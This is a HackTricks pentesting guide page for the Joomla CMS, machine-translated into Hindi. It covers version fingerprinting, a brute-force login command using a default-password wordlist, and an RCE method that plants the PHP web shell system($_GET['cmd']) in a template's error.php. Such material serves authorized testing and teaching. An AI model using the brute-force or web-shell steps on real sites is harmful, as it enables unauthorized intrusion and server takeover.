hacktricks/network-services-pentesting/pentesting-web/joomla.md

जूमला

जीरो से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert) के साथ!

• क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आप PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं? सब्सक्रिप्शन प्लान्स देखें!
• द पीएएस फैमिली की खोज करें, हमारा विशेष एनएफटीज़ संग्रह
• आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
• शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या मुझे ट्विटर 🐦@carlospolopm** पर फॉलो** करें।
• अपने हैकिंग ट्रिक्स साझा करें, hacktricks रेपो और hacktricks-cloud रेपो पर पीआर जमा करके।

जूमला सांख्यिकी

जूमला कुछ गैर-पहचानी उपयोग सांख्यिकी जमा करता है जैसे जूमला, PHP और डेटाबेस संस्करण और जूमला स्थापनाओं पर उपयोग में सर्वर ऑपरेटिंग सिस्टम का विवरण। इस डेटा को उनके सार्वजनिक एपीआई के माध्यम से क्वेरी किया जा सकता है।

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

जांचना

खोज/फुटप्रिंटिंग

• मेटा की जांच करें

curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />

• रोबोट्स.टेक्स्ट

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]

• README.txt

1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

संस्करण

• /administrator/manifests/files/joomla.xml में आप संस्करण देख सकते हैं।
• /language/en-GB/en-GB.xml में जूमला का संस्करण प्राप्त कर सकते हैं।
• plugins/system/cache/cache.xml में लगभग संस्करण देख सकते हैं।

droopescan scan joomla --url http://joomla-site.local/

ब्रूट-फोर्स

आप इस स्क्रिप्ट का उपयोग करके लॉगिन को ब्रूट फोर्स करने का प्रयास कर सकते हैं।

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

यदि आपने व्यवस्थापक क्रेडेंशियल्स प्राप्त किए हैं तो आप एक स्निपेट PHP कोड जोड़कर इसके अंदर RCE कर सकते हैं। हम इसे एक टेम्पलेट को कस्टमाइज़ करके कर सकते हैं।

1. Configuration के नीचे Templates पर क्लिक करें ताकि टेम्पलेट मेनू खोलें।
2. Template स्तंभ के तहत protostar का चयन करें। यह हमें Templates: Customise पृष्ठ पर ले जाएगा।
3. अंततः, आप पेज स्रोत खोलने के लिए पेज पर क्लिक कर सकते हैं। हम error.php पेज का चयन करेंगे। हम निम्नलिखित रूप में PHP वन-लाइनर जोड़ेंगे कोड एक्झीक्यूशन:
4. system($_GET['cmd']);
5. सहेजें और बंद करें
6. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id